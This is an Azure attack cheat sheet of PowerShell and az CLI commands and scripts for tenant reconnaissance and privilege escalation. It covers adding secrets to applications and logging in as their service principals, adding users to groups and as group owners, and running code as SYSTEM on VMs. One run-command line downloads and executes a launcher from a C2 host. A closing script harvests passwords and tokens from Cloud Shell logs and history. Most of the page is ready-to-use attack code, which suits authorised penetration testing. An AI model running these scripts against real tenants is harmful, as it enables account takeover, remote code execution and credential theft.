Azure CLI - PowerShell

Connect:

# AzureAD module for directory objects (users, roles, groups, apps); the Az module
# (Connect-AzAccount, used further down) covers subscriptions and resources
Connect-AzureAD

Recon:

Get AD user:

# the AzureAD cmdlets return 100 objects by default; pass -All $true for the full list
Get-AzureADUser -All $true
Get-AzureADUser -All $true | ?{$_.DisplayName -eq 'Administrator'}

Get AD Directory Role:

Get-AzureADDirectoryRole 
Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Global Administrator'} | select DisplayName, ObjectId,RoleTemplateId

Get AD directory role member (-ObjectId is mandatory; use the role ObjectId from above):

Get-AzureADDirectoryRoleMember -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101"

Get AD Group:

Get-AzureADGroup
Get-AzureADGroup -ObjectId "ObjectID"

Get AD Group member:

Get-AzureADGroupMember -ObjectId d2b8110d-900f-4a37-92f0-b9c541ee4440

Get AD Applications:

Get-AzureADApplication
Get-AzureADApplication -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101"

Get AD Application Owner:

Get-AzureADApplicationOwner -ObjectId "74897263-fd31-48b8-8370-9fb8a847e9ef"
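The recon cmdlets above combined into one added example (not from the original page): resolve a privileged directory role, list its members, and show which applications and groups each member owns, since owners are the pivots the PrivEsc section relies on. It assumes an existing Connect-AzureAD session; the function name and the default role name are my own choices.

```powershell
# Added example: map the members of one directory role to the apps/groups they own.
# Assumes Connect-AzureAD has already been run. Function name is an assumption.
function Get-RoleMemberOwnership {
    param(
        [string]$RoleName = 'Global Administrator'   # any activated directory role
    )

    # Get-AzureADDirectoryRole only returns roles that have been activated in the tenant
    $role = Get-AzureADDirectoryRole | Where-Object { $_.DisplayName -eq $RoleName }
    if (-not $role) { throw "Role '$RoleName' is not activated in this tenant" }

    # Build owner -> [object names] maps once, instead of one owner query per member
    $appsByOwner   = @{}
    $groupsByOwner = @{}
    foreach ($app in Get-AzureADApplication -All $true) {
        foreach ($owner in Get-AzureADApplicationOwner -ObjectId $app.ObjectId) {
            $appsByOwner[$owner.ObjectId] += @($app.DisplayName)
        }
    }
    foreach ($group in Get-AzureADGroup -All $true) {
        foreach ($owner in Get-AzureADGroupOwner -ObjectId $group.ObjectId) {
            $groupsByOwner[$owner.ObjectId] += @($group.DisplayName)
        }
    }

    # Direct members of the role (users, groups or service principals)
    foreach ($member in Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId) {
        [pscustomobject]@{
            Role        = $role.DisplayName
            Member      = $member.DisplayName
            ObjectType  = $member.ObjectType
            ObjectId    = $member.ObjectId
            OwnedApps   = ($appsByOwner[$member.ObjectId]   -join ', ')
            OwnedGroups = ($groupsByOwner[$member.ObjectId] -join ', ')
        }
    }
}

# Usage: privileged holders first; anyone with OwnedApps/OwnedGroups filled in is a pivot
Get-RoleMemberOwnership -RoleName 'Global Administrator' | Format-Table -AutoSize
```

Run it once per interesting role (Global Administrator, Privileged Role Administrator, Application Administrator); the two owner maps are built once, so the cost is one owner query per app and per group, not per member.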

PrivEsc:

Application & service principal exploitation

Add application secret:

# PowerZure function; works if you own the application or hold an app-admin role
# (the new secret lets you sign in as the app's service principal, see below)
Add-AzureADSPSecret -ApplicationName APPLICATION -Verbose

Authenticate as service principal:

# username is the application (client) id, not the ObjectId; secret is the one added above
$ApplicationId = "2097243e-269f-47-8d-f9c62ecc8b5c"
$ClientSecret = "Z1Y~TjWzaZw"
$SecurePassword = ConvertTo-SecureString -String $ClientSecret -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $ApplicationId, $SecurePassword
# -Tenant takes the tenant id; without -ServicePrincipal the credential is tried as a user login
Connect-AzAccount -Credential $Credential -Tenant b20fc61c-960d-4f40-bbbe-17ac412fe0c0 -ServicePrincipal
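The two steps above (add a secret, then log in as the service principal) as one added script, which is neither the page's nor PowerZure's code: it uses the AzureAD module's own New-AzureADApplicationPasswordCredential in place of the PowerZure cmdlet, retries the login while the new secret propagates, and finishes with Get-AzRoleAssignment to show what the service principal can reach. The application name, tenant id, key identifier and function name are assumptions.

```powershell
# Added example: add a client secret to an application you own, then authenticate
# as its service principal with the Az module. Requires Connect-AzureAD already done
# and either ownership of the app or an application-admin role. Names are assumptions.
function Invoke-AppSecretTakeover {
    param(
        [Parameter(Mandatory)][string]$ApplicationName,
        [Parameter(Mandatory)][string]$TenantId
    )

    $app = Get-AzureADApplication -Filter "DisplayName eq '$ApplicationName'"
    if (-not $app) { throw "Application '$ApplicationName' not found" }

    # A service principal must exist in this tenant for the app, or the login will fail
    $sp = Get-AzureADServicePrincipal -Filter "AppId eq '$($app.AppId)'"
    if (-not $sp) { throw "No service principal for AppId $($app.AppId) in this tenant" }

    # Random 32-char secret; the credential goes on the application object (ObjectId, not AppId)
    $secret = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 32 | ForEach-Object { [char]$_ })
    $null = New-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId `
        -CustomKeyIdentifier 'pentest' -Value $secret `
        -StartDate (Get-Date) -EndDate (Get-Date).AddDays(7)

    # Username for a service-principal login is the AppId (client id)
    $cred = New-Object System.Management.Automation.PSCredential (
        $app.AppId, (ConvertTo-SecureString $secret -AsPlainText -Force))

    # New secrets can take a minute to propagate; retry the login a few times
    $ctx = $null
    for ($i = 0; $i -lt 6 -and -not $ctx; $i++) {
        try { $ctx = Connect-AzAccount -ServicePrincipal -Credential $cred -Tenant $TenantId -ErrorAction Stop }
        catch { Start-Sleep -Seconds 10 }
    }
    if (-not $ctx) { throw 'Service principal login failed' }

    # What the SP holds at the resource layer: this is where the privesc value is
    Get-AzRoleAssignment -ObjectId $sp.ObjectId |
        Select-Object RoleDefinitionName, Scope
}

Invoke-AppSecretTakeover -ApplicationName 'APPLICATION' -TenantId 'b20fc61c-960d-4f40-bbbe-17ac412fe0c0'
```

Remove the credential afterwards (Remove-AzureADApplicationPasswordCredential with the KeyId it was given); a leftover secret on a client's app registration is a finding against the tester.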

AZAddMembers (BloodHound edge: group owner, or a role with group write)

Add target to group:

Add-AzureADGroupMember -ObjectId GROUP-ID -RefObjectId USER-ID

Add group owner (owners can add members and further owners):

Add-AzureADGroupOwner -ObjectId GROUP-ID -RefObjectId USER-ID

Virtual Machine:

List VMs:

(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}

Run command (executes as SYSTEM in the guest; needs Microsoft.Compute/virtualMachines/runCommand/action on the VM, e.g. Contributor):

az vm run-command invoke --command-id RunPowerShellScript --name VM-NAME -g RESOURCE-GROUP --scripts @join-domain-script.ps1 --parameters "user=admin" "password=secret-password"
az vm run-command invoke --command-id RunPowerShellScript --name CSETest -g TESTER --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"

Privesc:

# same enumeration as above: a VM that returns a managed identity is the target, since
# run-command gives SYSTEM on the guest and the identity's role assignments are usable from there
(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}
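The VM enumeration and run-command lines above wrapped as an added PowerShell example (not from the page): it reads each VM's identity block from a single az vm list call instead of one az vm identity show per VM, then runs a script on a chosen VM and splits the StdOut/StdErr entries that run-command returns. It assumes an authenticated az CLI; the function names and the whoami script are mine.

```powershell
# Added example: find VMs with a managed identity, then execute PowerShell on one via
# run-command and return its output. Assumes an authenticated az CLI. Names are assumptions.
function Get-VmManagedIdentity {
    # One list call: each VM carries an identity block (null when no identity is assigned)
    foreach ($vm in ((az vm list -o json) -join "`n" | ConvertFrom-Json)) {
        if (-not $vm.identity) { continue }
        [pscustomobject]@{
            Name          = $vm.name
            ResourceGroup = $vm.resourceGroup
            IdentityType  = $vm.identity.type           # SystemAssigned, UserAssigned or both
            PrincipalId   = $vm.identity.principalId    # object id to look up role assignments for
            UserAssigned  = (@($vm.identity.userAssignedIdentities.PSObject.Properties.Name) -join ', ')
        }
    }
}

function Invoke-VmRunCommand {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$ResourceGroup,
        [Parameter(Mandatory)][string]$Script
    )
    # RunPowerShellScript executes as SYSTEM on the guest; needs
    # Microsoft.Compute/virtualMachines/runCommand/action (e.g. Contributor) on the VM
    $raw = az vm run-command invoke --command-id RunPowerShellScript `
        --name $Name --resource-group $ResourceGroup --scripts $Script -o json
    if ($LASTEXITCODE -ne 0) { throw "run-command failed on $Name" }
    $result = ($raw -join "`n") | ConvertFrom-Json
    # value[] holds one entry per stream: code ComponentStatus/StdOut/... and ComponentStatus/StdErr/...
    [pscustomobject]@{
        VM     = $Name
        StdOut = ($result.value | Where-Object code -like '*StdOut*').message
        StdErr = ($result.value | Where-Object code -like '*StdErr*').message
    }
}

# Usage: enumerate candidates, then prove code execution on the first one
$targets = Get-VmManagedIdentity
$targets | Format-Table -AutoSize
if ($targets) {
    Invoke-VmRunCommand -Name $targets[0].Name -ResourceGroup $targets[0].ResourceGroup `
        -Script 'whoami; hostname'
}
```

Feed PrincipalId into Get-AzRoleAssignment -ObjectId to see what each identity can do before choosing which VM to run commands on; run-command output is also written to the Azure activity log, so keep scripts short and deliberate.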

Azure shell:

history enumeration:

# Cloud Shell persists $HOME (including .Azure/ErrorRecords, which records failed Az cmdlet
# invocations, parameters included) in a storage account file share, so old sessions survive.
# -B/-A are lines before/after the match; lowercase -b/-a mean byte-offset and binary-as-text.
grep -B5 -A5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log
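The single grep above generalised to the whole Cloud Shell home directory, as an added example (not from the page): it searches every ErrorRecords log plus the shell history files for several credential-shaped words and returns each hit with surrounding context. The ErrorRecords path is the page's; the PowerShell and bash history paths are my assumptions for their usual locations, and the function name is mine.

```powershell
# Added example: search the Cloud Shell home directory for leaked credentials.
# ErrorRecords path is from the page; history paths and function name are assumptions.
function Find-CloudShellSecrets {
    param(
        [string[]]$Paths = @(
            "$HOME/.Azure/ErrorRecords",                                         # Az cmdlet error dumps
            "$HOME/.local/share/powershell/PSReadLine/ConsoleHost_history.txt",  # PowerShell history (assumed path)
            "$HOME/.bash_history"                                                # bash history (assumed path)
        ),
        [string[]]$Patterns = @('Password', 'Secret', 'Token', 'ConnectionString', 'AccountKey'),
        [int]$Context = 5
    )
    # Missing paths are skipped silently; matches are case-insensitive by default
    Get-ChildItem -Path $Paths -File -Recurse -ErrorAction SilentlyContinue |
        Select-String -Pattern $Patterns -Context $Context, $Context |
        ForEach-Object {
            [pscustomobject]@{
                File    = $_.Path
                Line    = $_.LineNumber
                Match   = $_.Line.Trim()
                Context = (($_.Context.PreContext + $_.Context.PostContext) | ForEach-Object Trim) -join "`n"
            }
        }
}

Find-CloudShellSecrets | Format-List
```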
